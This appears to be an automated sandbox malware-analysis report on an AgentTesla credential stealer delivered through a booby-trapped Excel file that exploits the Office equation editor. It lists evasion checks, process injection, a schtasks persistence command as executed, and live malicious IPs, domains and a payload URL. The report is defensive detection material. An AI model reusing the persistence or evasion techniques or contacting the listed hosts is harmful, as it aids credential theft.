Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exe Process information set: NOOPENFILEERRORBOX
Source: Doc2.xlsx Stream path 'EncryptedPackage' entropy: 7.99880681599 (max. 8.0)

Malware Analysis System Evasion:

barindex
Yara detected AntiVM3
Source: Yara match File source: Process Memory Space: vbc.exe PID: 2964, type: MEMORY
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Source: C:\Users\Public\vbc.exe WMI Queries: IWbemServices::CreateInstanceEnum - Win32_BaseBoard
Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exe WMI Queries: IWbemServices::CreateInstanceEnum - Win32_BaseBoard
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Source: C:\Users\Public\vbc.exe WMI Queries: IWbemServices::CreateInstanceEnum - Win32_NetworkAdapterConfiguration
Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exe WMI Queries: IWbemServices::CreateInstanceEnum - Win32_NetworkAdapterConfiguration
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Source: vbc.exe, 00000006.00000002.2229803981.0000000002311000.00000004.00000001.sdmp, MLdAu.exe, 0000000B.00000002.2335458220.0000000001FF1000.00000004.00000001.sdmp Binary or memory string: WINE_GET_UNIX_FILE_NAME
Source: vbc.exe, 00000006.00000002.2229803981.0000000002311000.00000004.00000001.sdmp, MLdAu.exe, 0000000B.00000002.2335458220.0000000001FF1000.00000004.00000001.sdmp Binary or memory string: SBIEDLL.DLL
Contains long sleeps (>= 3 min)
Source: C:\Users\Public\vbc.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exe Thread delayed: delay time: 922337203685477
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Users\Public\vbc.exe Window / User API: threadDelayed 9502 Jump to behavior
Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exe Window / User API: threadDelayed 9500
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 1952 Thread sleep time: -360000s >= -30000s Jump to behavior
Source: C:\Users\Public\vbc.exe TID: 1276 Thread sleep time: -60000s >= -30000s Jump to behavior
Source: C:\Users\Public\vbc.exe TID: 2408 Thread sleep time: -60000s >= -30000s Jump to behavior
Source: C:\Users\Public\vbc.exe TID: 1028 Thread sleep time: -5534023222112862s >= -30000s Jump to behavior
Source: C:\Users\Public\vbc.exe TID: 1028 Thread sleep time: -150000s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exe TID: 1312 Thread sleep time: -60000s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exe TID: 856 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exe TID: 2480 Thread sleep time: -60000s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exe TID: 2260 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exe TID: 2156 Thread sleep time: -360000s >= -30000s
Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exe TID: 1304 Thread sleep time: -1844674407370954s >= -30000s
Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exe TID: 1304 Thread sleep time: -150000s >= -30000s
Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exe TID: 1272 Thread sleep count: 9500 > 30
Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exe TID: 1272 Thread sleep count: 245 > 30
Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exe TID: 1304 Thread sleep count: 104 > 30
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Source: C:\Users\Public\vbc.exe WMI Queries: IWbemServices::CreateInstanceEnum - Win32_Processor
Source: C:\Users\Public\vbc.exe WMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
Source: C:\Users\Public\vbc.exe WMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
Source: C:\Users\Public\vbc.exe WMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
Source: C:\Users\Public\vbc.exe WMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
Source: C:\Users\Public\vbc.exe WMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
Source: C:\Users\Public\vbc.exe WMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
Source: C:\Users\Public\vbc.exe WMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
Source: C:\Users\Public\vbc.exe WMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
Source: C:\Users\Public\vbc.exe WMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
Source: C:\Users\Public\vbc.exe WMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
Source: C:\Users\Public\vbc.exe WMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
Source: C:\Users\Public\vbc.exe WMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
Source: C:\Users\Public\vbc.exe WMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
Source: C:\Users\Public\vbc.exe WMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
Source: C:\Users\Public\vbc.exe WMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
Source: C:\Users\Public\vbc.exe WMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exe WMI Queries: IWbemServices::CreateInstanceEnum - Win32_Processor
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exe Last function: Thread delayed
Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exe Last function: Thread delayed
Source: C:\Users\Public\vbc.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\Public\vbc.exe Thread delayed: delay time: 30000 Jump to behavior
Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exe Thread delayed: delay time: 30000
Source: MLdAu.exe, 0000000B.00000002.2335458220.0000000001FF1000.00000004.00000001.sdmp Binary or memory string: VMware SVGA IIOData Source=localhost\sqlexpress;Initial Catalog=dbSMS;Integrated Security=True
Source: MLdAu.exe, 0000000B.00000002.2335458220.0000000001FF1000.00000004.00000001.sdmp Binary or memory string: vmware
Source: MLdAu.exe, 0000000B.00000002.2335458220.0000000001FF1000.00000004.00000001.sdmp Binary or memory string: C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
Source: MLdAu.exe, 0000000B.00000002.2335458220.0000000001FF1000.00000004.00000001.sdmp Binary or memory string: SOFTWARE\VMware, Inc.\VMware Tools
Source: vbc.exe, 00000006.00000002.2233213372.0000000005223000.00000004.00000001.sdmp Binary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}]
Source: MLdAu.exe, 0000000B.00000002.2335458220.0000000001FF1000.00000004.00000001.sdmp Binary or memory string: VMWARE
Source: MLdAu.exe, 0000000B.00000002.2335458220.0000000001FF1000.00000004.00000001.sdmp Binary or memory string: InstallPath%C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
Source: MLdAu.exe, 0000000B.00000002.2335458220.0000000001FF1000.00000004.00000001.sdmp Binary or memory string: VMWARE"SOFTWARE\VMware, Inc.\VMware ToolsLHARDWARE\DEVICEMAP\Scsi\Scsi Port 1\Scsi Bus 0\Target Id 0\Logical Unit Id 0LHARDWARE\DEVICEMAP\Scsi\Scsi Port 2\Scsi Bus 0\Target Id 0\Logical Unit Id 0'SYSTEM\ControlSet001\Services\Disk\Enum
Source: MLdAu.exe, 0000000B.00000002.2335458220.0000000001FF1000.00000004.00000001.sdmp Binary or memory string: VMware SVGA II
Source: MLdAu.exe, 0000000B.00000002.2335458220.0000000001FF1000.00000004.00000001.sdmp Binary or memory string: vmwareNSYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000
Source: C:\Users\Public\vbc.exe Process information queried: ProcessInformation Jump to behavior

Anti Debugging:

barindex
Enables debug privileges
Source: C:\Users\Public\vbc.exe Process token adjusted: Debug Jump to behavior
Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exe Process token adjusted: Debug Jump to behavior
Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exe Process token adjusted: Debug
Source: C:\Users\Public\vbc.exe Memory allocated: page read and write | page guard Jump to behavior

HIPS / PFW / Operating System Protection Evasion:

barindex
Injects a PE file into a foreign processes
Source: C:\Users\Public\vbc.exe Memory written: C:\Users\Public\vbc.exe base: 400000 value starts with: 4D5A Jump to behavior
Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exe Memory written: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exe base: 400000 value starts with: 4D5A Jump to behavior
Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exe Memory written: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exe base: 400000 value starts with: 4D5A Jump to behavior
Creates a process in suspended mode (likely to inject code)
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe' Jump to behavior
Source: C:\Users\Public\vbc.exe Process created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\WzyRXCWtdGSdEA' /XML 'C:\Users\user\AppData\Local\Temp\tmpB2BC.tmp' Jump to behavior
Source: C:\Users\Public\vbc.exe Process created: C:\Users\Public\vbc.exe {path} Jump to behavior
Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exe Process created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\WzyRXCWtdGSdEA' /XML 'C:\Users\user\AppData\Local\Temp\tmp7511.tmp' Jump to behavior
Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exe Process created: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exe {path} Jump to behavior
Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exe Process created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\WzyRXCWtdGSdEA' /XML 'C:\Users\user\AppData\Local\Temp\tmp74F2.tmp' Jump to behavior
Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exe Process created: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exe {path} Jump to behavior
Source: vbc.exe, 00000009.00000002.2370335356.0000000000CA0000.00000002.00000001.sdmp Binary or memory string: Program Manager
Source: vbc.exe, 00000009.00000002.2370335356.0000000000CA0000.00000002.00000001.sdmp Binary or memory string: Shell_TrayWnd
Source: vbc.exe, 00000009.00000002.2370335356.0000000000CA0000.00000002.00000001.sdmp Binary or memory string: !Progman

Language, Device and Operating System Detection:

barindex
Queries the volume information (name, serial number etc) of a device
Source: C:\Users\Public\vbc.exe Queries volume information: C:\Users\Public\vbc.exe VolumeInformation Jump to behavior
Source: C:\Users\Public\vbc.exe Queries volume information: C:\Users\Public\vbc.exe VolumeInformation Jump to behavior
Source: C:\Users\Public\vbc.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exe Queries volume information: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exe Queries volume information: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exe Queries volume information: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exe Queries volume information: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exe VolumeInformation
Source: C:\Users\Public\vbc.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior

Lowering of HIPS / PFW / Operating System Security Settings:

barindex
Adds / modifies Windows certificates
Source: C:\Users\Public\vbc.exe Registry key created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 Blob Jump to behavior

Stealing of Sensitive Information:

barindex
Yara detected AgentTesla
Source: Yara match File source: 12.2.MLdAu.exe.328e310.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.MLdAu.exe.30ee310.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.2.vbc.exe.340e310.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.MLdAu.exe.30ee310.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 18.2.MLdAu.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.MLdAu.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.2.vbc.exe.340e310.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.MLdAu.exe.328e310.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.vbc.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000012.00000002.2336318504.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.2341517856.0000000003191000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.2369735651.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.2369629595.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.2342137023.0000000002FF1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.2230917923.00000000034B9000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.2230665557.0000000003311000.00000004.00000001.sdmp, type: MEMORY
Yara detected AgentTesla
Source: Yara match File source: 12.2.MLdAu.exe.328e310.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.MLdAu.exe.30ee310.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.2.vbc.exe.340e310.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.MLdAu.exe.30ee310.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 18.2.MLdAu.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.MLdAu.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.2.vbc.exe.340e310.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.MLdAu.exe.328e310.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.vbc.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000012.00000002.2336318504.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.2341517856.0000000003191000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.2370417505.0000000002251000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.2369735651.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.2369629595.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.2370313444.0000000001FD1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.2342137023.0000000002FF1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000002.2338492595.0000000002261000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.2230917923.00000000034B9000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.2230665557.0000000003311000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: vbc.exe PID: 2148, type: MEMORY
Source: Yara match File source: Process Memory Space: vbc.exe PID: 2964, type: MEMORY
Yara detected Credential Stealer
Source: Yara match File source: 00000009.00000002.2370417505.0000000002251000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.2370313444.0000000001FD1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000002.2338492595.0000000002261000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: vbc.exe PID: 2148, type: MEMORY

Remote Access Functionality:

barindex
Yara detected AgentTesla
Source: Yara match File source: 12.2.MLdAu.exe.328e310.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.MLdAu.exe.30ee310.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.2.vbc.exe.340e310.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.MLdAu.exe.30ee310.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 18.2.MLdAu.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.MLdAu.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.2.vbc.exe.340e310.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.MLdAu.exe.328e310.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.vbc.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000012.00000002.2336318504.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.2341517856.0000000003191000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.2369735651.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.2369629595.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.2342137023.0000000002FF1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.2230917923.00000000034B9000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.2230665557.0000000003311000.00000004.00000001.sdmp, type: MEMORY
Yara detected AgentTesla
Source: Yara match File source: 12.2.MLdAu.exe.328e310.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.MLdAu.exe.30ee310.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.2.vbc.exe.340e310.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.MLdAu.exe.30ee310.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 18.2.MLdAu.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.MLdAu.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.2.vbc.exe.340e310.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.MLdAu.exe.328e310.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.vbc.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000012.00000002.2336318504.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.2341517856.0000000003191000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.2370417505.0000000002251000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.2369735651.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.2369629595.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.2370313444.0000000001FD1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.2342137023.0000000002FF1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000002.2338492595.0000000002261000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.2230917923.00000000034B9000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.2230665557.0000000003311000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: vbc.exe PID: 2148, type: MEMORY
Source: Yara match File source: Process Memory Space: vbc.exe PID: 2964, type: MEMORY
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 signatures2 2 Behavior Graph ID: 452692 Sample: Doc2.xlsx Startdate: 22/07/2021 Architecture: WINDOWS Score: 100 55 Found malware configuration 2->55 57 Antivirus detection for URL or domain 2->57 59 Multi AV Scanner detection for dropped file 2->59 61 14 other signatures 2->61 7 EQNEDT32.EXE 12 2->7         started        12 MLdAu.exe 2 2->12         started        14 MLdAu.exe 2 2->14         started        16 EXCEL.EXE 34 36 2->16         started        process3 dnsIp4 49 arkemagrup.com 185.26.106.165, 49165, 80 ATE-ASFR France 7->49 41 C:\Users\user\...\Doc_87654334567[1].exe, PE32 7->41 dropped 43 C:\Users\Public\vbc.exe, PE32 7->43 dropped 71 Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802) 7->71 18 vbc.exe 3 7->18         started        73 Multi AV Scanner detection for dropped file 12->73 75 Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines) 12->75 77 Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines) 12->77 22 schtasks.exe 12->22         started        24 MLdAu.exe 12->24         started        79 Injects a PE file into a foreign processes 14->79 26 schtasks.exe 14->26         started        28 MLdAu.exe 14->28         started        45 C:\Users\user\Desktop\~$Doc2.xlsx, data 16->45 dropped file5 signatures6 process7 file8 37 C:\Users\user\AppData\...\WzyRXCWtdGSdEA.exe, PE32 18->37 dropped 39 C:\Users\user\AppData\Local\...\tmpB2BC.tmp, XML 18->39 dropped 63 Multi AV Scanner detection for dropped file 18->63 65 Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines) 18->65 67 Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines) 18->67 69 2 other signatures 18->69 30 vbc.exe 1 6 18->30         started        35 schtasks.exe 18->35         started        signatures9 process10 dnsIp11 51 mail.spamora.net 185.26.106.194, 49166, 49167, 49169 ATE-ASFR France 30->51 47 C:\Users\user\AppData\Roaming\...\MLdAu.exe, PE32 30->47 dropped 53 Hides that the sample has been downloaded from the Internet (zone.identifier) 30->53 file12 signatures13
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
185.26.106.194
 mail.spamora.net France
24935 ATE-ASFR true
185.26.106.165
 arkemagrup.com France
24935 ATE-ASFR true

Contacted Domains

Name IP Active
mail.spamora.net 185.26.106.194 true
arkemagrup.com 185.26.106.165 true

Contacted URLs

Name Malicious Antivirus Detection Reputation
http://arkemagrup.com/Doc_87654334567.exe true
  • Avira URL Cloud: malware
 unknown